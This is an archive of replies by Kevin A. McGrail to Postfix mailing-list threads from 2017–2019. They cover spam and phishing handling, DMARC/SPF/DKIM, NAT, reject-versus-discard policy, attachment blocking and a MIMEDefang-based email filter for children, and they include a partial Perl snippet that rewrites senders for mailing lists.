https://himss.webex.com/himss/globalcallin.php?serviceType=EC&ED=743596137&tollFree=1
<https://www.google.com/url?q=https%3A%2F%2Fhimss.webex.com%2Fhimss%2Fglobalcallin.php%3FserviceType%3DEC%26ED%3D743596137%26tollFree%3D1&sa=D&ust=1553730640914000&usg=AFQjCNHxuDYDF6P8xxy_CyDyxJ_EV-QWGA>Toll-free
dialing restrictions:
https://www.webex.com/pdf/tollfree_restrictions.pdf
<https://www.google.com/url?q=https%3A%2F%2Fwww.webex.com%2Fpdf%2Ftollfree_restrictions.pdf&sa=D&ust=1553730640914000&usg=AFQjCNFEa-zxAltZcMVMj9XNBRIxOQqE2A>Access
code: 927 552 095

Regards,

KAM

-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

Re: pishing from ME

[Kevin A. McGrail]

On 3/22/2019 7:19 PM, Christian Schmitz wrote:
> Hi everyone:
>   I have a small mail server with fewer emails account, The server is: 
> Opensuse/Postfix/apache
>
> Today i receive a pishing email Words more or less say that i was hacked, 
> that 
> he know my passwords blah blah blah and i must pay on bit_coins. The email 
> content is 100% pishing and no real hacking because sevral reasons:
Christian,

They do know the passwords but they didn't hack your PC.  See
haveibeenpwned.com.  They compromised other services you use and you
need better password management.

See
https://www.bettercloud.com/monitor/a-top-g-suite-expert-shares-his-31-best-modern-security-tips/
and search passphrases.

Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this exact
run of spams.

Regards,
KAM
-- 
*Kevin A. McGrail*
CEO Emeritus

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

https://www.linkedin.com/in/kmcgrail

Re: Fwd: analysing of dmarc report

[Kevin A. McGrail]

You might look into dmarcian.com to help.
Regards,
KAM

On November 21, 2018 2:33:12 AM EST, Poliman - Serwis  wrote:
>I have a problem with understanding dmarc reports and some features.
>I attach two reports. First one come from google.com, second one from
>tumieszkamy.pl. On my server is dns zone of domain kamir-transport.pl
>but
>whole mail service is deployed on Google - in dns zone MX points to
>Google
>and there are all mailboxes, aliases etc. Last time I have configured
>dkim
>and dmarc policies and I got two reports. Honestly I don't know why
>two,
>from two different providers - google.com and tumieszkamy.pl. Moreover
>in
>report originating from google I see IP of my server [which fails spf
>and
>dkim policies] and I don't understand why this IP is evaluated? Second
>thing which I don't understand is second report which I got from
>tumieszkamy.pl.
>SPF record in dns zone of domain kamir-transport.pl was looking like
>below
>(now I changed it to slightly different):
>*v=spf1 mx include:_spf.google.com  -all*
>
>Does anybody could help uderstand these things?
>
>-- 
>
>*Pozdrawiam / Best Regards*
>*Piotr Bracha*

Re: Read Only account

[Kevin A. McGrail]

On 4/20/2018 3:40 PM, @lbutlr wrote:
> How would I configure a user so that they could only read mail and not send 
> any mail (even to local users).
>
Different auth for POP or IMAP vs SMTP?

Re: Spammer rejected, but resends every 10 minutes. Any way to prevent this

[Kevin A. McGrail]

On 3/13/2018 10:51 PM, li...@lazygranch.com wrote:
> I'm getting hit every 10 minutes from this spammer. As you can see I am
> rejecting the message. I wonder if the offending email server doesn't
> know the message is being rejected? 
>
> Mar 13 23:28:58 centos-1gb-sfo1-01 postfix/smtpd[22153]: NOQUEUE:
> reject: RCPT from unknown[113.247.6.67]: 450 4.7.1 Client host
> rejected: cannot find your reverse hostname, [113.247.6.67];
> from= to= proto=ESMTP
> helo=

Have you looked at something like fail2ban that can automate an iptables
block?

Re: FWIW, port 465 gets standards-track blessing from RFC8314

[Kevin A. McGrail]

On 2/12/2018 9:05 PM, @lbutlr wrote:

On 2018-02-12 (18:28 MST), Harald Koch  wrote:

I can't think of a single reason to have two submission ports.

Compatability with the clients that only implement one?

Are there any? It's been a long time since I saw someone using an old enough 
Outlook to require 465.


We support all the ports.  Stretching for a benefit, the only one I can 
see is that it's SSL from end to end without one bit of clear text.  I 
would suppose that would make it less likely to hijack.  I'll admit it's 
a stretch.


Regards,

kAM

Re: Server will send spam

[Kevin A. McGrail]

On 1/29/2018 4:59 PM, Maurizio Caloro wrote:


Since today me Email Server will be send a lot of rubish, and i dont 
know why


please can any one give me here any little Help!



The evidence you sent shows from a brief review that it's coming from 
your mail server.  I think you likely have a user where the account was 
compromised that's relaying off that box.


Can you cross correlate the mail queued to a single user?  I would 
shutoff email while you research.  You are going to have a lot work to 
clean up off of blacklists I would gather and it will get worse the 
longer it goes on.


Regards,
KAM

Re: Two different IP for one mx

[Kevin A. McGrail]

On 1/29/2018 5:03 PM, jin&hitman&Barracuda wrote:

It is 192.168.34.30/24 


So that's a Class C (256 IPs) block from the reserved private class B 
address block*.  So you are definitely NATted if you have access to the 
internet.


If you have a 1:1 NAT and can do port forwards, etc. up stream, it will 
work.  But it sounds like you have something more complicated in front 
of that box.


Regards,

KAM

*https://en.wikipedia.org/wiki/Reserved_IP_addresses or RFC 1918 but 
these are the reserved private network addresses.


10.x.x.x

172.16.x x to 172.31.x.x

192.168.x.x

Re: Two different IP for one mx

[Kevin A. McGrail]

On 1/29/2018 4:09 PM, jin&hitman&Barracuda wrote:
We are tring to move our mx server to another isp. They gave us an IP 
address but there is some strange points. When i try to connect any 
mail related port on that ip, it send my connection to our new postfix 
server. There is a destination nat on it. It is strange becouse i 
can't see my actual source ip. I tried with many different hosts and 
It looks like there is a source nat and i saw same ip as my source ip 
wherever i try.


From new postfix server,  when i try to reach any server on internet, 
i see another ip address on the source ip field and it is fixed too.


I believe there is a mistake. Could it be feasible two different ip 
for incoming and outgoing on one mx server ?
With NAT it could definitely be possible.  What's your machines local ip 
address with ifconfig?  Is it a reserved private address?


Regards,
KAM

Re: accept email if pass SPF or DKIM

[Kevin A. McGrail]

On 1/10/2018 9:53 PM, li...@lazygranch.com wrote:

RTFMing, I see that both opendkim and python-policyd-spf have
whitelisting capabilities (especially python-policyd-spf). But for the
most part, my legitimate incoming email passes DKIM or SPF, but often
not both. What I would like to do is accept email that passes either
DKIM or SPF, but the milters are not connected in anyway that I can
see. What I'm trying to avoid is setting up whitelists for each domain
based on which method of identity the sysop decided to implement.

That sounds like a problematic approach to me.

If an administrator of a domain sets up DNS for SPF records and then 
fails, it should fail.
If an administrator of a domain sets up DNS for DKIM records and that 
fails, it should fail.


If an email is failing either, the administrator of the sending domain 
fails either, that indicates a problem.  Assuming your system isn't 
breaking DKIM, the sender really should be notified to resolve the 
issue.  Whitelisting would really open you up to problems.


Regards,
KAM

Re: How to fake Per-Recipient Data Responses (PRDR)?

[Kevin A. McGrail]

On 10/2/2017 11:47 AM, Noel Jones wrote:

Yes, for sure. Extra recipients will get a 4xx response.

Note this may*severely*  delay deliveries, depending on the sender's
retry policy.  If a message arrives with 100 recipients, the sender
will need to retry 99 times, which will likely take a very long time.


Agreed about the delay.  I accept once and reinject internally with a 
milter so there is no delay and 1 email with 100 recipients becomes 100 
emails.  But it's nice to know this option exists because it might be 
helpful for store and queue internal purposes.  Thanks for pointing it out!


Regards,
KAM

Re: How to fake Per-Recipient Data Responses (PRDR)?

[Kevin A. McGrail]

On 10/2/2017 11:14 AM, Noel Jones wrote:
http://www.postfix.org/postconf.5.html#smtpd_recipient_limit 
I don't think we are talking about the same thing.  If I set this to 1, 
I would expect a 5xx for an email with more than one recipient. Do you 
know for sure?


Regards,
KAM

Re: How to fake Per-Recipient Data Responses (PRDR)?

[Kevin A. McGrail]

On 10/1/2017 8:15 PM, MRob wrote:
Hello, short of Per-Recipient Data Responses (PRDR) becoming standard, 
may I ask how administrators are faking it? I understand you can 
temp-fail all but the first rcpt-to, but how to do this in Postfix? 
Does it require a custom milter? Surely there must be a published 
solution somewhere?
I do it in a milter two ways.  One, I temp-fail all but one recipient at 
a time which I find problematic or two, I create a new message and 
reinject it to the original recipients.  I do this so I can have per 
user settings on delivery and spam settings.  DKIM makes this tough.


So I'm interested if you can do this in postfix as well.

Regards,
KAM

Re: Simple mailing list: Possible for multiple domains?

[Kevin A. McGrail]

Benny,

I wrote those notes years ago when Yahoo! surprise a lot of people with 
the enforcement of DMARC with little consideration for mailing lists.


http://dmarc.org/faq.html#s_3 is the key point.

IMO, some providers acted rashly and broke a lot of things but the end 
it likely is better for the security of the internet and email.


Regards,
KAM

Re: Simple mailing list: Possible for multiple domains?

[Kevin A. McGrail]

On 8/21/2017 8:30 AM, Benny Pedersen wrote:

wie...@porcupine.org skrev den 2017-08-21 14:05:


Use mailman. It sets the envelope sender, meaning that there is no
need for SRS, and presumably supports From: header munging, to work
around DMARC damage.


what damage ?, atleast its not needed on postfix maillist


Hi Benny,

These notes from when we used MD to make a workaround for this issue 
before Mailman also implemented workarounds might help:


# BLOCK IF FROM YAHOO (AND OTHERS) BECAUSE THEY SET DMARC TOO STRICTLY
  # 
http://www.pcworld.com/article/2141120/yahoo-email-antispoofing-policy-breaks-mailing-lists.html
  # REWRITE THE FROM HEADER AND OTHER FIELDS PER RECOMMENDATION 
HERE: http://dmarc.org/faq.html#s_3


Regards,
KAM

Re: accept+discard vs. reject

[Kevin A. McGrail]

On 7/25/2017 8:48 PM, /dev/rob0 wrote:

I am curious, what kind of logic do you have to determine that a
spamming client might be a backscatterer?  Are you talking about a
custom policy service, or a milter?


For the record, I can agree to disagree as I respect and understand your 
position.  I just choose to do it differently and think others should as 
well.


But yes, I use a milter.  I am a fanboy of MIMEDefang.

For example, in his case, I have a REDIS backend and would store message 
IDs if I give a 5xx.  Then if I see the same message id retried, you 
could do the 2xx+silent discard.


Regards,
KAM

Re: What's a better error code than 554 to get a sending server to stop retrying?

[Kevin A. McGrail]

On 7/25/2017 7:42 PM, /dev/rob0 wrote:

Oh, I disagree.  The best thing to do is to reject anything you're
unwilling/unable to deliver.  You're not causing any bounces; if a
connecting client does generate a bounce for your rejection that is
THEIR problem; or in the case of a human sender, that is the way to
avoid mail loss.


We can debate RFC's all day but the reality is that we are dealing with 
people not following the RFCs like spambots.  They will just retry and 
if you do any type of queue and check, then you can cause backscatter, etc.


My advice remains the same if you have mail you are giving a 5xx that is 
retrying.  Giving it a 5xx is the correct answer.  If that doesn't work, 
you will find you need to 2xx it and silently discard.


As mentioned, we do this for viruses in particularly to rid the world of 
them.  I'm sure it breaks an RFC in letter but not in spirit as it's my 
job to avoid viruses getting through and sometimes they are looking for 
blowback messages to carry the payload.


Regards,
KAM

Re: What's a better error code than 554 to get a sending server to stop retrying?

[Kevin A. McGrail]

On 7/25/2017 5:51 PM, robg...@nospammail.net wrote:

Depending on where I read about it that "554 5.7.1" error code means "failed 
transaction".
Unfortunately, you might need logic to accept and silently discard. We 
do this, for example, with viruses to avoid blowback.


Regards,
KAM

Re: OT? - Blocking attachments

[Kevin A. McGrail]

On 5/14/2017 7:22 AM, john wrote:


This may not be a Postfix problem, but bearing in mind the recent 
events this forum may have some good ideas.


After the recent rasomeware attacks we are considering the idea of 
blocking all attachments.  I am not sure of the best way of doing 
this, but several ideas have been put forward:


I am a consistent fan of milter logic, especially MIMEDefang to solve 
these issues.  It allows you the logic of perl combined with Postfix 
where you can use a variety of solutions that fit the issue:  regex to 
block, database connections for allowed senders, system calls to av 
software, attachment renaming, attachment removal/quarantine, etc.


Though realize that the Windows Defender Bug last week or so was a big 
deal because all you had to do is receive the file.  The scanner then 
scanned the specially crafted file and bam: You were compromised without 
even opening the email.  So that throws a wrench in some of your scenarios.


Anyway, I suggest if you are interested, take a look at mimedefang and 
join the mimedefang mailing list.  The bad_filename would be the first 
concept to look at and I'm typically happy to share my tricks open 
source.  Just inappropes to keep bombarding postfix list with 
non-postfix stuff though I agree it's on the fringe.


Regards,
KAM

Re: Trace spam activity on mail server

[Kevin A. McGrail]

On 5/2/2017 10:56 AM, li...@lazygranch.com wrote:

Would a spammy email server only trigger one RBL?


Sure.

Spam is often in the eye of the beholder, people use different feeds, 
different policies, purposes, etc.


I wouldn't discount it that it's an issue just because it's only on one 
RBL.  I'm a public mirror for quite a few and the overlap is not as high 
as one might think.


Regards,
KAM

Re: Trace spam activity on mail server

[Kevin A. McGrail]

On 5/2/2017 10:02 AM, Michael Segel wrote:

Just to follow up…
I ran the check on his domain:
https://mxtoolbox.com/domain/netlite.it/

Pretty clean, maybe a few things to fix, but he’s not on any black list.

I don’t know when he set up his domain, it could be that Trend Micro blocked 
the IP block due to a previous tenant and never took them off.

Truthfully, I don’t use much more than Spamhaus these days. in terms of RBLs.

He’s not running an open relay and if there was a spammer on his network, 
Spamhaus would have caught it too. Or someone else.

Its not Matteo’s server and I suspect its Trend Micro.


Yes, I'm a big fan of MXToolBox.  Great tool!  I agree, you might be 
looking for a ghost in the machine that doesn't exist and it's a FP from 
TrendMicro.



Regards,
KAM

--
*Kevin A. McGrail*
CEO

Peregrine Computer Consultants Corporation
10311 Cascade Lane
Fairfax, VA 22032

http://www.pccc.com/

703-359-9700 x50 / 800-823-8402 (Toll-Free)
703-798-0171 (wireless)
kmcgr...@pccc.com <mailto:kmcgr...@pccc.com>

Re: Trace spam activity on mail server

[Kevin A. McGrail]

On 5/2/2017 9:51 AM, Michael Segel wrote:

You can run a check on your MX Server… there are a couple of web sites that do 
this… and I think one or two will identify the RBLs that include you.
One trick I use a lot when I have an infected machine on a network or a 
customer with a problem is that I setup a smarthost running a milter 
that runs the email through a spam checker, logs the answer and then 
tempfails the emails.


Then I can analyze if there is an issue and do a silent discard by 
subject or internal IP if we find a compromised machine while letting 
everything else go through.


Regards,
KAM

Re: Do you know an FOSS email system for kids?

[Kevin A. McGrail]

On 4/30/2017 2:12 PM, Dedeco Balaco Baco wrote:

But what did you use to make this interface? Before reading some documentation 
about Beggarmail and Mimedefang, I thought about using PHP. Now I am not sure 
that would be a practical solution.


PHP would be a straightforward way to go.  Any language / framework that 
allows you to build input forms and toggles and store them in a 
database. I've used numerous solutions.


Off the cuff, I'd likely look at http://www.codeigniter.com/

Regards,
KAM

Re: Do you know an FOSS email system for kids?

[Kevin A. McGrail]

On 4/30/2017 12:48 PM, Dedeco Balaco Baco wrote:
Kam, I am still a bit puzzled with what I should do. I have seen the 
README file inside your attachment, and it mentions Sendmail several 
times. But it does not mention Postfix. Is it possible to install 
Mimedefang and BeggarMail with Postfix? I have read that Postfix aims 
to be an alternative to Sendmail. But for me, that never installed 
either, it is a doubt if this is possible. And if it isn't, the 
discussion may become offtopic to this list. 
Postfix supports the milter specification and can be used with 
MIMEDefang.  Apologies if the README is confusing.  Treat then as 
interchangeable.



I have also downloaded Mimedefang and read some of its documentation. It seems 
very flexible with its install and work directories - which is something I will 
surely use. Before I play with Mimedefang, should I set up a working mail 
server with Postfix? Or with Sendmail? Please tell, if you know.
You can use either.  The milter specification was invented by sendmail 
so likely I slip into saying sendmail.  But I've used sendmail and 
postfix without technical concern.  Typically it becomes a question of 
licensing.



You mentioned that you cannot give the source for the interface you use. May I 
ask: what is the reason for that? No problem, an interface is something that 
should not be too hard for me. But how exactly you do it?
It has commercial code and graphics we didn't license for distribution.  
Plus I didn't feel it appropriate to bring up licensing on the postfix 
list.  And as you said, I didn't feel a UI was a big deal to implement.


Regards,
KAM

Re: OT? SRV records etc

[Kevin A. McGrail]

On 4/25/2017 4:57 PM, John wrote:
How likely is it for a DNS to have SRV records for such things as 
smtp. imap ...
I know that a dumb ? but I am try to guesstimate how big an dewy eyed 
optomist I am being in hoping that they are common practise. 
In my experience, very rare, not even sure what I would use them for... 
Lots of experience with lots of domains, never used once for SMTP or 
IMAP that I can remember...

Re: Do you know an FOSS email system for kids?

[Kevin A. McGrail]

On 4/19/2017 7:43 AM, Dedeco Balaco Baco wrote:

in the last months, I have been searching for an email system with
some features to make it better for kids, even for younger ages,
and also their parents. We need a few features to guarantee some
security to free messaging among known friends, but some
supervision for unknown addresses.

I have a system I wrote for my kids and nephews/nieces.  It builds
on top of mimedefang with mysql backend.  I cannot share the UI for
the database manipulations but can give you the database layout and
example queries. It used a CMS on Apache that did the ability to
whitelist/blacklist, etc.

I can package up the snippets under GPLv2 and some documentation if
that's a solution you are interested in pursuing.  If you are
interested in publishing it further, even if 3 people ever use it,
I'll be more helpful as I like to surface code I've written for
public benefit.


Please do it, KAM! I would like to see the details of your solution in 
practical ways, both for users and for its administrators. And if I make any 
changes to it, I will make them public somehow, of course.

A detail that does not matter much to me: do you have a reason to choose GPLv2 
instead of GPLv3? I have read two section in the article about GPL in 
Wikipedia: https://en.wikipedia.org/wiki/GPLv2#Version_2 and 
https://en.wikipedia.org/wiki/GPLv3#Version_3 .


Dedeco,

I picked GPLv2 based on the licensing for MIMEDefang to keep the 
original author's wishes specifically v2 or later.


The code is stable and has some nice tricks for SQL from MIMEDefang.

It's a good starting point but I wouldn't oversell it.  I specifically 
cannot include the UI but have included example queries for the quick 
introduction of a UI and the hooks for the report to include links to a 
website for the one click blacklist/whitelist for parents.


Regards,
KAM


beggarmail-1.0.tar.bz2
Description: application/bzip-compressed-tar

Re: Do you know an FOSS email system for kids?

[Kevin A. McGrail]

On 4/15/2017 10:31 AM, Dedeco Balaco Baco wrote:

in the last months, I have been searching for an email system with some 
features to make it better for kids, even for younger ages, and also their 
parents. We need a few features to guarantee some security to free messaging 
among known friends, but some supervision for unknown addresses.


I have a system I wrote for my kids and nephews/nieces.  It builds on 
top of mimedefang with mysql backend.  I cannot share the UI for the 
database manipulations but can give you the database layout and example 
queries.  It used a CMS on Apache that did the ability to 
whitelist/blacklist, etc.


I can package up the snippets under GPLv2 and some documentation if 
that's a solution you are interested in pursuing.  If you are interested 
in publishing it further, even if 3 people ever use it, I'll be more 
helpful as I like to surface code I've written for public benefit.


Regards,
KAM

Re: How to implement something close to, but not quite an "announcement-only" mailing list?

[Kevin A. McGrail]

On 4/14/2017 10:19 PM, Ramon F Herrera wrote:

On 4/14/2017 8:41 PM, Kevin A. McGrail wrote:

On 4/14/2017 9:35 PM, Ramon F Herrera wrote:


I guess this would be more descriptive and succinct:

A "members-only PLUS disguising of all e-mail addresses 
contained in the headers" mailing list.
I didn't follow all your logic in the previous email but overall 
you'll likely need something like *mailman or majordomo* plus 
something like MIMEDefang in front of it to achieve your needs.


This begs the question, to all the readers: Given those 2 
requirements, and my lack of time to learn/compare Majordomo vs. 
mailman, which one would you use?
Attached is the discussed scrap we use in MIMEDefang that we mangle 
emails before they get to our mailing list.  It maintains the same GPL 
the original MIMEDefang-filter is produced under.  I didn't include 
every sub, etc. as I expect it's not all relevant except to kick off 
your thinking.


I use MIMEDefang with Postfix and it's a very good solution.  I monitor 
the MD list as well if you have questions and use it.


I use Mailman and it works.  Of course, I'm an advisor to Virtru along 
with John Viega, Mailman's original author. So in solidarity with him, 
I'm going to completely malign majordomo and say that it's horrible!  
:-)  More seriously, both are great, both work well and I use lists 
every day using both.  Lot comparing a Honda Civic to a Toyota Camry.  
They both just work and get you from point A to B with little grief or 
comfort.


Regards,
KAM
# This program may be distributed under the terms of the GNU General
# Public License, Version 2, or (at your option) any later version.
#***
#
# Copyright (C) 2017 PCCC
#***

#get domain name from an email address
sub get_domain_from_email {
  my ($domain) = @_;

  #REMOVE ANY LEADING/TRAILING <>'s
  $domain =~ s/(^<|>$)//g;
  #REMOVE ANY LEADING/TRAILING SPACE'S
  $domain =~ s/^ *//g;
  $domain =~ s/ *$//g;
  #REMOVE EVERYTHING UP TO THE @ SYMBOL
  $domain =~ s/.*\@//g;

  return $domain;
}

foreach $recip (@Recipients) {
  # BLOCK IF FROM YAHOO (AND OTHERS) BECAUSE THEY SET DMARC TOO STRICTLY
  # 
http://www.pcworld.com/article/2141120/yahoo-email-antispoofing-policy-breaks-mailing-lists.html
  # REWRITE THE FROM HEADER AND OTHER FIELDS PER RECOMMENDATION HERE: 
http://dmarc.org/faq.html#s_3

  # If Sender is set to DMARC reject and recipient is a mailing list - NOTE 
Yahoo.com and AOL.com reject as of 4/23
  if (($recip =~ m/\@mailman\./i or
   $recip =~ m/\@lists\./i)

  and

 # exclude the admnistrivia addresses like admin confirm, join, leave, 
etc.
 ($recip !~ 
/\-(admin|bounces|confirm|join|leave|owner|request|subscribe|unsubscribe)(\+.*)?\@/i)

 ) {

my ($container, $parser, $original, $report2, $dmarc_reject_notice, 
$daemon_sender, $dmarc_result, $sender_domain, $modification_subject, 
$pretty_sender);

# Automatically check DMARC DNS entry
$sender_domain = &get_domain_from_email($Sender);
# DNS test for DMARC entry with timeout of 5 seconds
$dmarc_result = &check_dmarc(domain=>$sender_domain, timeout=>5);

if ($dmarc_result =~ /p=(reject|quarantine)/i) {

  # NOTIFY SENDER AND REWRITE THE SENDER TO A DO-NOT-REPLY ADDRESS
  md_syslog('warning', "Modifying message to mailing list due to DMARC 
- $recip - $Sender - $Subject");
  $dmarc_reject_notice = "Your email to $recip was modified to prevent 
your email address on mailing lists from being incorrectly flagged as a forgery.

In order to permit your email through to the mailing list, we have rewritten 
the From address to a do-not-reply address.  Depending on the list 
configuration, you may not receive replies and will need to monitor the list.  
Additionally, this may delay your email as it will require manual intervention 
by the list moderator to approve.

We apologize for the inconvenience but the cause of the issue rests squarely 
with spammers who have forced email providers to implement anti-forgery 
technologies that impact mailing lists heavily.

Sincerely,

Kevin A. McGrail
President, PCCC";


  #CUSTOMIZE NOTIFICATION PARAMS
  $daemon_sender = 'do-not-re...@daemon.pccc.com';
  $modification_subject = &utf8_to_mime("Important Mailing List 
Notification re:[". &mime_to_utf8($Subject) ."]");

  #SEND NOTIFICATION
  action_notify_sender_immediately(Sender=>$Sender, DaemonName=>'PCCC 
Raptor Notice', DaemonAddress=>$daemon_sender, 
NotifySenderSubject=>$modification_subject, body=>$dmarc_reject_notice);

  #TEMPORARILY REMOVE MAI

Re: How to implement something close to, but not quite an "announcement-only" mailing list?

[Kevin A. McGrail]

On 4/14/2017 9:35 PM, Ramon F Herrera wrote:


I guess this would be more descriptive and succinct:

A "members-only PLUS disguising of all e-mail addresses contained 
in the headers" mailing list.
I didn't follow all your logic in the previous email but overall you'll 
likely need something like mailman or majordomo plus something like 
MIMEDefang in front of it to achieve your needs.


Happy to share a snippet for mimedefang that handles the rewrites needed 
from when DMARC was released and broke a lot of mailing lists.


The Bunny, The Bunny, Oh, I ate the Bunny,
KAM